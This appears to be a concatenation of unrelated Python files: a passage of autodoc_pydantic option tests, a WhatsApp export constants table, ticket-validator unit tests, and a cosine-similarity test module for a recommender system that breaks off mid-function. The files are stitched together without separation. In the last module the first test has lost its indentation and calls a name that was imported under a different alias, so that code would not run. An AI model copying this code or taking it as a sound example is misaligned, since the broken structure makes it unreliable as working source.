def test_autodoc_pydantic_field_list_validators_false(autodocument):
    kwargs = dict(object_path='target.configuration.FieldListValidators.field',
                  **KWARGS)

    result = [
        '',
        '.. py:pydantic_field:: FieldListValidators.field',
        '   :module: target.configuration',
        '   :type: int',
        '',
        '   Field.',
        ''
    ]

    # explicit global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_list_validators": False},
        **kwargs)
    assert result == actual

    # explicit local
    actual = autodocument(
        options_doc={"field-list-validators": False},
        **kwargs)
    assert result == actual

    # explicit local overwrite global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_list_validators": True},
        options_doc={"field-list-validators": False},
        **kwargs)
    assert result == actual


def test_autodoc_pydantic_field_doc_policy_docstring(autodocument):
    kwargs = dict(object_path='target.configuration.FieldDocPolicy.field',
                  **KWARGS)

    result = [
        '',
        '.. py:pydantic_field:: FieldDocPolicy.field',
        '   :module: target.configuration',
        '   :type: int',
        '',
        '   Field.',
        ''
    ]

    # explicit global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_doc_policy": "docstring"},
        **kwargs)
    assert result == actual

    # explicit local
    actual = autodocument(
        options_doc={"field-doc-policy": "docstring"},
        **kwargs)
    assert result == actual

    # explicit local overwrite global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_doc_policy": "both"},
        options_doc={"field-doc-policy": "docstring"},
        **kwargs)
    assert result == actual


def test_autodoc_pydantic_field_doc_policy_description(autodocument):
    kwargs = dict(object_path='target.configuration.FieldDocPolicy.field',
                  **KWARGS)

    result = [
        '',
        '.. py:pydantic_field:: FieldDocPolicy.field',
        '   :module: target.configuration',
        '   :type: int',
        '',
        '   Custom Desc.',
        ''
    ]

    # explicit global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_doc_policy": "description"},
        **kwargs)
    assert result == actual

    # explicit local
    actual = autodocument(
        options_doc={"field-doc-policy": "description"},
        **kwargs)
    assert result == actual

    # explicit local overwrite global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_doc_policy": "both"},
        options_doc={"field-doc-policy": "description"},
        **kwargs)
    assert result == actual


def test_autodoc_pydantic_field_doc_policy_both(autodocument):
    kwargs = dict(object_path='target.configuration.FieldDocPolicy.field',
                  **KWARGS)

    result = [
        '',
        '.. py:pydantic_field:: FieldDocPolicy.field',
        '   :module: target.configuration',
        '   :type: int',
        '',
        '   Field.',
        '',
        '   Custom Desc.',
        ''
    ]

    # explicit global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_doc_policy": "both"},
        **kwargs)
    assert result == actual

    # explicit local
    actual = autodocument(
        options_doc={"field-doc-policy": "both"},
        **kwargs)
    assert result == actual

    # explicit local overwrite global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_doc_policy": "docstring"},
        options_doc={"field-doc-policy": "both"},
        **kwargs)
    assert result == actual


def test_autodoc_pydantic_field_show_constraints_true(autodocument):
    kwargs = dict(
        object_path='target.configuration.FieldShowConstraints.field',
        **KWARGS)

    result = [
        '',
        '.. py:pydantic_field:: FieldShowConstraints.field',
        '   :module: target.configuration',
        '   :type: int',
        '',
        '   Field.',
        '',
        '   :Constraints:',
        '      - **minimum** = 0',
        '      - **maximum** = 100',
        ''
    ]

    # explicit global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_constraints": True},
        **kwargs)
    assert result == actual

    # explicit local
    actual = autodocument(
        options_doc={"field-show-constraints": True},
        **kwargs)
    assert result == actual

    # explicit local overwrite global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_constraints": False},
        options_doc={"field-show-constraints": True},
        **kwargs)
    assert result == actual


def test_autodoc_pydantic_field_show_constraints_false(autodocument):
    kwargs = dict(
        object_path='target.configuration.FieldShowConstraints.field',
        **KWARGS)

    result = [
        '',
        '.. py:pydantic_field:: FieldShowConstraints.field',
        '   :module: target.configuration',
        '   :type: int',
        '',
        '   Field.',
        ''
    ]

    # explicit global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_constraints": False},
        **kwargs)
    assert result == actual

    # explicit local
    actual = autodocument(
        options_doc={"field-show-constraints": False},
        **kwargs)
    assert result == actual

    # explicit local overwrite global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_constraints": True},
        options_doc={"field-show-constraints": False},
        **kwargs)
    assert result == actual


def test_autodoc_pydantic_field_show_alias_true(autodocument):
    kwargs = dict(
        object_path='target.configuration.FieldShowAlias.field',
        **KWARGS)

    result = [
        '',
        '.. py:pydantic_field:: FieldShowAlias.field',
        '   :module: target.configuration',
        '   :type: int',
        '   :alias: field2',
        '',
        '   Field.',
        '',
    ]

    # explicit global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_alias": True},
        **kwargs)
    assert result == actual

    # explicit local
    actual = autodocument(
        options_doc={"field-show-alias": True},
        **kwargs)
    assert result == actual

    # explicit local overwrite global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_alias": False},
        options_doc={"field-show-alias": True},
        **kwargs)
    assert result == actual


def test_autodoc_pydantic_field_show_alias_false(autodocument):
    kwargs = dict(
        object_path='target.configuration.FieldShowAlias.field',
        **KWARGS)

    result = [
        '',
        '.. py:pydantic_field:: FieldShowAlias.field',
        '   :module: target.configuration',
        '   :type: int',
        '',
        '   Field.',
        '',
    ]

    # explicit global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_alias": False},
        **kwargs)
    assert result == actual

    # explicit local
    actual = autodocument(
        options_doc={"field-show-alias": False},
        **kwargs)
    assert result == actual

    # explicit local overwrite global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_alias": True},
        options_doc={"field-show-alias": False},
        **kwargs)
    assert result == actual


def test_autodoc_pydantic_field_show_alias_true_directive(parse_rst):
    """Tests pydantic_field directive."""

    default_value = desc_annotation_default_value("1")
    prefix = desc_annotation_directive_prefix("field")
    output_nodes = (
        index,
        [desc, ([desc_signature, ([desc_annotation, prefix],
                                  [desc_addname, "FieldShowAlias."],
                                  [desc_name, "field"],
                                  default_value,
                                  [desc_annotation, " (alias 'field2')"])],
                [desc_content, ()])
         ]
    )

    # explicit local
    input_rst = [
        '',
        '.. py:pydantic_field:: FieldShowAlias.field',
        '   :module: target.configuration',
        '   :value: 1',
        '   :alias: field2',
        ''
    ]

    doctree = parse_rst(input_rst)
    assert_node(doctree, output_nodes)

    # explicit local overwrite explicit global
    doctree = parse_rst(input_rst,
                        conf={"autodoc_pydantic_field_show_alias": False})
    assert_node(doctree, output_nodes)

    doctree = parse_rst(input_rst,
                        conf={"autodoc_pydantic_field_show_alias": True})
    assert_node(doctree, output_nodes)


def test_autodoc_pydantic_field_show_alias_false_directive(parse_rst):
    """Tests pydantic_field directive."""

    default_value = desc_annotation_default_value("1")
    prefix = desc_annotation_directive_prefix("field")
    output_nodes = (
        index,
        [desc, ([desc_signature, ([desc_annotation, prefix],
                                  [desc_addname, "FieldShowAlias."],
                                  [desc_name, "field"],
                                  default_value)],
                [desc_content, ()])
         ]
    )

    # explicit local
    input_rst = [
        '',
        '.. py:pydantic_field:: FieldShowAlias.field',
        '   :module: target.configuration',
        '   :value: 1',
        ''
    ]

    doctree = parse_rst(input_rst)
    assert_node(doctree, output_nodes)

    # explicit local overwrite explicit global
    doctree = parse_rst(input_rst,
                        conf={"autodoc_pydantic_field_show_alias": True})
    assert_node(doctree, output_nodes)

    # explicit global
    input_rst = [
        '',
        '.. py:pydantic_field:: FieldShowAlias.field',
        '   :module: target.configuration',
        '   :value: 1',
        ''
    ]

    doctree = parse_rst(input_rst,
                        conf={"autodoc_pydantic_field_show_alias": True})
    assert_node(doctree, output_nodes)


def test_autodoc_pydantic_field_show_default_true(autodocument):
    kwargs = dict(
        object_path='target.configuration.FieldShowDefault.field',
        **KWARGS)

    result = [
        '',
        '.. py:pydantic_field:: FieldShowDefault.field',
        '   :module: target.configuration',
        '   :type: int',
        '   :value: 1',
        '',
        '   Field.',
        ''
    ]

    # explicit global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_default": True},
        **kwargs)
    assert result == actual

    # explicit local
    actual = autodocument(
        options_doc={"field-show-default": True},
        **kwargs)
    assert result == actual

    # explicit local overwrite global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_default": False},
        options_doc={"field-show-default": True},
        **kwargs)
    assert result == actual


def test_autodoc_pydantic_field_show_default_false(autodocument):
    kwargs = dict(
        object_path='target.configuration.FieldShowDefault.field',
        **KWARGS)

    result = [
        '',
        '.. py:pydantic_field:: FieldShowDefault.field',
        '   :module: target.configuration',
        '   :type: int',
        '',
        '   Field.',
        ''
    ]

    # explicit global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_default": False},
        **kwargs)
    assert result == actual

    # explicit local
    actual = autodocument(
        options_doc={"field-show-default": False},
        **kwargs)
    assert result == actual

    # explicit local overwrite global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_default": True},
        options_doc={"field-show-default": False},
        **kwargs)
    assert result == actual


def test_autodoc_pydantic_field_signature_prefix(autodocument):
    kwargs = dict(
        object_path='target.configuration.FieldSignaturePrefix.field',
        **KWARGS)

    # default
    result = [
        '',
        ".. py:pydantic_field:: FieldSignaturePrefix.field",
        '   :module: target.configuration',
        '   :type: int',
        '',
        '   Field.',
        ''
    ]

    actual = autodocument(**kwargs)
    assert result == actual

    # explicit value
    result = [
        '',
        ".. py:pydantic_field:: FieldSignaturePrefix.field",
        '   :module: target.configuration',
        '   :type: int',
        '   :field-signature-prefix: foobar',
        '',
        '   Field.',
        ''
    ]

    actual = autodocument(
        options_doc={"field-signature-prefix": "foobar"},
        **kwargs)
    assert result == actual

    # explicit empty
    result = [
        '',
        ".. py:pydantic_field:: FieldSignaturePrefix.field",
        '   :module: target.configuration',
        '   :type: int',
        '   :field-signature-prefix: ',
        '',
        '   Field.',
        ''
    ]

    actual = autodocument(
        options_doc={"field-signature-prefix": ""},
        **kwargs)
    assert result == actual


def test_autodoc_pydantic_field_signature_prefix_directive(parse_rst):

    # default
    input_rst = [
        '',
        ".. py:pydantic_field:: FieldSignaturePrefix.field",
        '   :module: target.configuration',
        '',
        '   Field.',
        ''
    ]

    doctree = parse_rst(input_rst)
    prefix = desc_annotation_directive_prefix("field")
    assert_node(doctree[1][0][0], [desc_annotation, prefix])

    # empty
    doctree = parse_rst(input_rst,
                        conf={"autodoc_pydantic_field_signature_prefix": ""})
    prefix = desc_annotation_directive_prefix("attribute")
    assert_node(doctree[1][0][0], [desc_annotation, prefix])

    # custom
    input_rst = [
        '',
        ".. py:pydantic_field:: FieldSignaturePrefix.field",
        '   :module: target.configuration',
        '   :field-signature-prefix: foobar',
        '',
        '   Field.',
        ''
    ]

    doctree = parse_rst(input_rst)
    prefix = desc_annotation_directive_prefix("foobar")
    assert_node(doctree[1][0][0], [desc_annotation, prefix])


@pytest.mark.parametrize("field", ["field1", "field2", "field3"])
def test_autodoc_pydantic_field_show_required_true(field, autodocument):
    result = [
        f'',
        f'.. py:pydantic_field:: FieldShowRequired.{field}',
        '   :module: target.configuration',
        '   :type: int',
        '   :required:',
        f'',
        f'   {field}',
        f'',
    ]

    kwargs = dict(
        object_path=f'target.configuration.FieldShowRequired.{field}',
        **KWARGS
    )

    # explicit global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_required": True},
        **kwargs)
    assert result == actual

    # explicit local
    actual = autodocument(options_doc={"field-show-required": True}, **kwargs)
    assert result == actual

    # explicit local overwrite global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_required": False},
        options_doc={"field-show-required": True},
        **kwargs)
    assert result == actual


@pytest.mark.parametrize("field", ["field1", "field2", "field3"])
def test_autodoc_pydantic_field_show_required_false(field, autodocument):
    result = [
        '',
        f'.. py:pydantic_field:: FieldShowRequired.{field}',
        '   :module: target.configuration',
        '   :type: int',
        '',
        f'   {field}',
        '',
    ]

    kwargs = dict(
        object_path=f'target.configuration.FieldShowRequired.{field}',
        **KWARGS
    )

    # explicit global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_required": False},
        **kwargs)
    assert result == actual

    # explicit local
    actual = autodocument(options_doc={"field-show-required": False}, **kwargs)
    assert result == actual

    # explicit local overwrite global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_required": True},
        options_doc={"field-show-required": False},
        **kwargs)
    assert result == actual


@pytest.mark.parametrize(["field", "value"],
                         [("field1", "PydanticUndefined"),
                          ("field2", "Ellipsis"),
                          ("field3", "Ellipsis")])
def test_autodoc_pydantic_field_show_required_false_show_default_true(
        field, value, autodocument):
    if pydantic.VERSION < "1.8":
        value = "Ellipsis"

    result = [
        '',
        f'.. py:pydantic_field:: FieldShowRequired.{field}',
        '   :module: target.configuration',
        '   :type: int',
        f'   :value: {value}',
        '',
        f'   {field}',
        '',
    ]

    kwargs = dict(
        object_path=f'target.configuration.FieldShowRequired.{field}',
        **KWARGS
    )

    # explicit global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_required": False,
                     "autodoc_pydantic_field_show_default": True},
        **kwargs)
    assert result == actual

    # explicit local
    actual = autodocument(options_doc={"field-show-required": False,
                                       "field-show-default": True},
                          **kwargs)
    assert result == actual

    # explicit local overwrite global
    actual = autodocument(
        options_app={"autodoc_pydantic_field_show_required": True,
                     "autodoc_pydantic_field_show_default": False},
        options_doc={"field-show-required": False,
                     "field-show-default": True},
        **kwargs)
    assert result == actual


def test_autodoc_pydantic_field_show_required_true_directive(parse_rst):
    """Tests pydantic_field directive."""

    prefix = desc_annotation_directive_prefix("field")
    output_nodes = (
        index,
        [desc, ([desc_signature, ([desc_annotation, prefix],
                                  [desc_addname, "FieldShowRequired."],
                                  [desc_name, "field"],
                                  [desc_annotation, " [Required]"],
                                  [desc_annotation, " (alias 'field2')"])],
                [desc_content, ()])
         ]
    )

    # explicit local
    input_rst = [
        '',
        '.. py:pydantic_field:: FieldShowRequired.field',
        '   :module: target.configuration',
        '   :required:',
        '   :alias: field2',
        ''
    ]

    doctree = parse_rst(input_rst)
    assert_node(doctree, output_nodes)

    # explicit local overwrite explicit global
    doctree = parse_rst(input_rst,
                        conf={"autodoc_pydantic_field_show_required": False})
    assert_node(doctree, output_nodes)


def test_autodoc_pydantic_field_show_required_false_directive(parse_rst):
    """Tests pydantic_field directive."""

    prefix = desc_annotation_directive_prefix("field")
    output_nodes = (
        index,
        [desc, ([desc_signature, ([desc_annotation, prefix],
                                  [desc_addname, "FieldShowRequired."],
                                  [desc_name, "field"],
                                  [desc_annotation, " (alias 'field2')"])],
                [desc_content, ()])
         ]
    )

    # explicit local
    input_rst = [
        '',
        '.. py:pydantic_field:: FieldShowRequired.field',
        '   :module: target.configuration',
        '   :alias: field2',
        ''
    ]

    doctree = parse_rst(input_rst)
    assert_node(doctree, output_nodes)

    # explicit local overwrite explicit global
    doctree = parse_rst(input_rst,
                        conf={"autodoc_pydantic_field_show_required": True})
    assert_node(doctree, output_nodes)
# whatsapptojson/constants.py (repo: ankschoubey/Whatsapp-Text-To-Json-Converter, MIT license)
devices = {
    'iphone': {
        'date_format': '%d/%m/%y %I:%M:%S %p',
        'delimeter_format': ']|: ',
        'attachment_tag': '<\u200eattached>',
        'attachment_delimeters': ' • | <\u200eattached>'
    },
    'android': {
        'date_format': '%m/%d/%y %I:%M %p',
        'delimeter_format': ' - |: ',
        'attachment_tag': '(file attached)',
        'attachment_delimeters': '\(file attached\)'
    },
    'iphone_24': {
        'date_format': '%d/%m/%y %H:%M:%S',
        'delimeter_format': ']|: ',
        'attachment_tag': '<\u200eattached>',
        'attachment_delimeters': ' • | <\u200eattached>'
    },
    'android_24': {
        'date_format': '%m/%d/%y %H:%M',
        'delimeter_format': ' - |: ',
        'attachment_tag': '(file attached)',
        'attachment_delimeters': '\(file attached\)'
    }
}
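These profiles feed `datetime.strptime` (the `date_format` key) and regular-expression splitting (the delimiter keys). A minimal sketch of how one profile could be applied to a single exported line; the `parse_line` helper and the sample line are illustrative, not part of this module:

```python
import re
from datetime import datetime

# Copy of the 'android' profile above, inlined so the sketch is self-contained.
ANDROID = {
    'date_format': '%m/%d/%y %I:%M %p',
    'delimeter_format': ' - |: ',
}

def parse_line(line, profile):
    """Split one export line into (timestamp, sender, message)."""
    # ' - ' separates the date from the sender; ': ' separates sender from text.
    date_part, sender, message = re.split(profile['delimeter_format'], line, maxsplit=2)
    timestamp = datetime.strptime(date_part, profile['date_format'])
    return timestamp, sender, message

ts, sender, message = parse_line('03/14/21 9:05 PM - Alice: hello world', ANDROID)
print(ts, sender, message)  # 2021-03-14 21:05:00 Alice hello world
```

Note that `delimeter_format` doubles as a regex alternation, which is why `attachment_delimeters` escapes its parentheses with backslashes.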
# tests/unittests/test_validator.py (repo: cooomma/mayday-ticketing-bot, MIT license)
import unittest

from mayday.helpers.item_validator import ItemValidator
from mayday.objects.ticket import Ticket

USERNAME = 'Mayday'
USER_ID = 123456789


class Test(unittest.TestCase):

    def test_validator_success(self):
        ticket = Ticket(username=USERNAME, user_id=USER_ID)
        ticket.category = 1
        ticket.date = 508
        ticket.price_id = 1
        ticket.quantity = 2
        ticket.status = 1

        result = ticket.validate()
        assert result['status']

        validator = ItemValidator(ticket.to_dict())
        result = validator.check_ticket()
        assert result['status']

    def test_validator_missing_category(self):
        ticket = Ticket(username=USERNAME, user_id=USER_ID)
        ticket.date = 508
        ticket.price_id = 1
        ticket.quantity = 2
        ticket.status = 1

        result = ticket.validate()
        assert result['status'] is False
        assert result['info'] == '門票類別未填喔'

        validator = ItemValidator(ticket.to_dict())
        result = validator.check_ticket()
        assert result['status'] is False
        assert result['info'] == '門票類別未填喔'

    def test_validator_missing_date(self):
        ticket = Ticket(username=USERNAME, user_id=USER_ID)
        ticket.category = 1
        ticket.price_id = 1
        ticket.quantity = 2
        ticket.status = 1

        result = ticket.validate()
        assert result['status'] is False
        assert result['info'] == '日期未填喔'

        validator = ItemValidator(ticket.to_dict())
        result = validator.check_ticket()
        assert result['status'] is False
        assert result['info'] == '日期未填喔'

    def test_validator_missing_price(self):
        ticket = Ticket(username=USERNAME, user_id=USER_ID)
        ticket.category = 1
        ticket.date = 508
        ticket.quantity = 2
        ticket.status = 1

        result = ticket.validate()
        assert result['status'] is False
        assert result['info'] == '價錢未填喔'

        validator = ItemValidator(ticket.to_dict())
        result = validator.check_ticket()
        assert result['status'] is False
        assert result['info'] == '價錢未填喔'

    def test_validator_missing_quantity(self):
        ticket = Ticket(username=USERNAME, user_id=USER_ID)
        ticket.category = 1
        ticket.date = 508
        ticket.price_id = 1
        ticket.status = 1

        result = ticket.validate()
        assert result['status'] is False
        assert result['info'] == '數量未填喔'

        validator = ItemValidator(ticket.to_dict())
        result = validator.check_ticket()
        assert result['status'] is False
        assert result['info'] == '數量未填喔'

    def test_validator_error_message(self):
        ticket = Ticket(username=USERNAME, user_id=USER_ID)
        expected = '門票類別未填喔\n日期未填喔\n價錢未填喔\n數量未填喔'

        result = ticket.validate()
        assert result['status'] is False
        assert result['info'] == expected

        validator = ItemValidator(ticket.to_dict())
        result = validator.check_ticket()
        assert result['status'] is False
        assert result['info'] == expected
#!/usr/bin/env python3
# Base/Similarity/cosine_similarity_test.py (repo: marcomussi/RecommenderSystemPolimi, MIT license)
# -*- coding: utf-8 -*-
"""
Created on 23/10/17
@author: Maurizio Ferrari Dacrema
"""
import unittest
from data.Movielens_10m.Movielens10MReader import Movielens10MReader
from Base.Recommender_utils import similarityMatrixTopK
import subprocess, os
import numpy as np
import time
import scipy.sparse as sps
def areSparseEquals(Sparse1, Sparse2):
if(Sparse1.shape != Sparse2.shape):
return False
return (Sparse1 - Sparse2).nnz ==0
class MyTestCase(unittest.TestCase):
def test_cosine_similarity_dense(self):
from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
from Base.cosine_similarity import Compute_Similarity_Python as Cosine_Similarity_Python
from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel as Cosine_Similarity_Parallel
TopK = 0
data_matrix = np.array([[1,1,0,1],[0,1,1,1],[1,0,1,0]])
data_matrix = sps.csr_matrix(data_matrix)
cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize = False)
W_dense_Cython = cosine_similarity.compute_similarity()
cosine_similarity = Compute_Similarity_Python(data_matrix, topK=TopK, normalize = False)
W_dense_Python = cosine_similarity.compute_similarity()
cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize = False)
W_dense_Parallel = cosine_similarity.compute_similarity()
W_dense_mul = data_matrix.T.dot(data_matrix)
W_dense_mul[np.arange(W_dense_mul.shape[0]),np.arange(W_dense_mul.shape[0])] = 0.0
assert np.all(W_dense_Cython == W_dense_mul), "W_dense_Cython not matching control"
assert np.all(W_dense_Python == W_dense_mul), "W_dense_Python not matching control"
assert np.all(W_dense_Parallel == W_dense_mul), "W_dense_Parallel not matching control"
    def test_cosine_similarity_dense_row_weighted(self):

        from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
        from Base.cosine_similarity import Compute_Similarity_Python
        from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel

        TopK = 0

        data_matrix = np.array([[1, 2, 0, 1], [0, 1, 4, 1], [3, 0, 1, 0]])
        data_matrix = sps.csr_matrix(data_matrix, dtype=np.float64)

        row_weights = [2, 3, 0, 4]

        cosine_similarity = Cosine_Similarity_Cython(data_matrix.T, topK=TopK, normalize=False, row_weights=row_weights)
        W_dense_Cython = cosine_similarity.compute_similarity()

        cosine_similarity = Compute_Similarity_Python(data_matrix.T, topK=TopK, normalize=False, row_weights=row_weights)
        W_dense_Python = cosine_similarity.compute_similarity()

        cosine_similarity = Cosine_Similarity_Parallel(data_matrix.T, topK=TopK, normalize=False, row_weights=row_weights)
        W_dense_Parallel = cosine_similarity.compute_similarity()

        # Control: weighted dot product via a diagonal weight matrix
        W_dense_mul = data_matrix.dot(sps.diags(row_weights)).dot(data_matrix.T).toarray()
        W_dense_mul[np.arange(W_dense_mul.shape[0]), np.arange(W_dense_mul.shape[0])] = 0.0

        assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_dense_Cython not matching control"
        assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
        assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
    def test_cosine_similarity_dense_external_cfr(self):

        from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
        from Base.cosine_similarity import Compute_Similarity_Python
        from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel
        from sklearn.metrics.pairwise import cosine_similarity as Cosine_Similarity_Sklearn
        from scipy.spatial.distance import jaccard as Jaccard_Distance_Scipy

        TopK = 0
        shrink = 0

        data_matrix = np.array([[1, 2, 0, 1], [0, 1, 4, 1], [1, 3, 1, 0]])
        data_matrix = sps.csr_matrix(data_matrix)

        cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize=True, shrink=shrink)
        W_dense_Cython = cosine_similarity.compute_similarity()

        cosine_similarity = Compute_Similarity_Python(data_matrix, topK=TopK, normalize=True, shrink=shrink)
        W_dense_Python = cosine_similarity.compute_similarity()

        cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize=True, shrink=shrink)
        W_dense_Parallel = cosine_similarity.compute_similarity()

        # External control: scikit-learn computes row-row similarity, so pass the transpose
        W_dense_sklearn = Cosine_Similarity_Sklearn(data_matrix.copy().T)
        W_dense_sklearn[np.arange(W_dense_sklearn.shape[0]), np.arange(W_dense_sklearn.shape[0])] = 0.0

        assert np.allclose(W_dense_Cython, W_dense_sklearn, atol=1e-4), "W_dense_Cython Cosine not matching Sklearn control"
        assert np.allclose(W_dense_Python, W_dense_sklearn, atol=1e-4), "W_dense_Python Cosine not matching Sklearn control"
        assert np.allclose(W_dense_Parallel, W_dense_sklearn, atol=1e-4), "W_dense_Parallel Cosine not matching Sklearn control"

        data_matrix = np.array([[1, 2, 0, 1], [0, 1, 4, 1], [1, 3, 1, 0]])
        data_matrix = sps.csr_matrix(data_matrix)

        cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize=True, shrink=shrink,
                                                     mode='jaccard')
        W_dense_Cython = cosine_similarity.compute_similarity()

        cosine_similarity = Compute_Similarity_Python(data_matrix, topK=TopK, normalize=True, shrink=shrink,
                                                      mode='jaccard')
        W_dense_Python = cosine_similarity.compute_similarity()

        cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize=True, shrink=shrink,
                                                       mode='jaccard')
        W_dense_Parallel = cosine_similarity.compute_similarity()

        W_dense_Scipy = np.zeros_like(W_dense_Python)

        # Binarize the data before computing the scipy Jaccard control
        data_matrix.data = np.ones_like(data_matrix.data)
        data_matrix = data_matrix.toarray()

        for row in range(W_dense_Scipy.shape[0]):
            for col in range(W_dense_Scipy.shape[1]):
                if row != col:
                    W_dense_Scipy[row, col] = 1 - Jaccard_Distance_Scipy(data_matrix[:, row], data_matrix[:, col])

        assert np.allclose(W_dense_Cython, W_dense_Scipy, atol=1e-4), "W_dense_Cython Jaccard not matching Scipy control"
        assert np.allclose(W_dense_Python, W_dense_Scipy, atol=1e-4), "W_dense_Python Jaccard not matching Scipy control"
        assert np.allclose(W_dense_Parallel, W_dense_Scipy, atol=1e-4), "W_dense_Parallel Jaccard not matching Scipy control"
    def test_cosine_similarity_dense_normalize(self):

        from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
        from Base.cosine_similarity import Compute_Similarity as Cosine_Similarity_Python
        from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel
        import numpy.matlib

        TopK = 0
        shrink = 5

        data_matrix = np.array([[1, 1, 0, 1], [0, 1, 1, 1], [1, 0, 1, 0]])
        data_matrix = sps.csr_matrix(data_matrix)

        cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize=True, shrink=shrink)
        W_dense_Cython = cosine_similarity.compute_similarity()

        cosine_similarity = Cosine_Similarity_Python(data_matrix, topK=TopK, normalize=True, shrink=shrink)
        W_dense_Python = cosine_similarity.compute_similarity()

        cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize=True, shrink=shrink)
        W_dense_Parallel = cosine_similarity.compute_similarity()

        # Control: outer product of the column norms, plus the shrink term
        W_dense_denominator = np.matlib.repmat(data_matrix.power(2).sum(axis=0), data_matrix.shape[1], 1)
        W_dense_denominator = np.sqrt(W_dense_denominator)
        W_dense_denominator = np.asarray(np.multiply(W_dense_denominator, W_dense_denominator.T)) + shrink

        W_dense_mul = data_matrix.T.dot(data_matrix).toarray()
        W_dense_mul = W_dense_mul / W_dense_denominator
        W_dense_mul[np.arange(W_dense_mul.shape[0]), np.arange(W_dense_mul.shape[0])] = 0.0

        assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_dense_Cython not matching control"
        assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
        assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
    def test_cosine_similarity_dense_adjusted(self):

        from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
        from Base.cosine_similarity import Compute_Similarity as Cosine_Similarity_Python
        from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel
        import numpy.matlib

        TopK = 0
        shrink = 0

        data_matrix = np.array([[1, 2, 0, 1], [0, 1, 4, 1], [1, 3, 1, 0]])
        data_matrix = sps.csr_matrix(data_matrix)

        cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize=True,
                                                     shrink=shrink, mode='adjusted')
        W_dense_Cython = cosine_similarity.compute_similarity()

        cosine_similarity = Cosine_Similarity_Python(data_matrix, topK=TopK, normalize=True,
                                                     shrink=shrink, mode='adjusted')
        W_dense_Python = cosine_similarity.compute_similarity()

        cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize=True,
                                                       shrink=shrink, mode='adjusted')
        W_dense_Parallel = cosine_similarity.compute_similarity()

        # Control: mean-center each user (row) over its nonzero ratings, then cosine
        data_matrix = data_matrix.toarray().astype(np.float64)

        for row in range(data_matrix.shape[0]):
            nonzeroMask = data_matrix[row, :] > 0
            data_matrix[row, :][nonzeroMask] -= np.mean(data_matrix[row, :][nonzeroMask])

        W_dense_denominator = np.matlib.repmat((data_matrix ** 2).sum(axis=0), data_matrix.shape[1], 1)
        W_dense_denominator = np.sqrt(W_dense_denominator)
        W_dense_denominator = np.multiply(W_dense_denominator, W_dense_denominator.T) + shrink

        W_dense_mul = data_matrix.T.dot(data_matrix)
        W_dense_mul[W_dense_denominator > 0] /= W_dense_denominator[W_dense_denominator > 0]
        W_dense_mul[np.arange(W_dense_mul.shape[0]), np.arange(W_dense_mul.shape[0])] = 0.0

        assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_dense_Cython not matching control"
        assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
        assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
    def test_cosine_similarity_dense_pearson(self):

        from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
        from Base.cosine_similarity import Compute_Similarity as Cosine_Similarity_Python
        from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel
        import numpy.matlib

        TopK = 0
        shrink = 0

        data_matrix = np.array([[1, 2, 0, 1], [0, 1, 4, 1], [1, 3, 1, 0]])
        data_matrix = sps.csr_matrix(data_matrix)

        cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize=True,
                                                     shrink=shrink, mode='pearson')
        W_dense_Cython = cosine_similarity.compute_similarity()

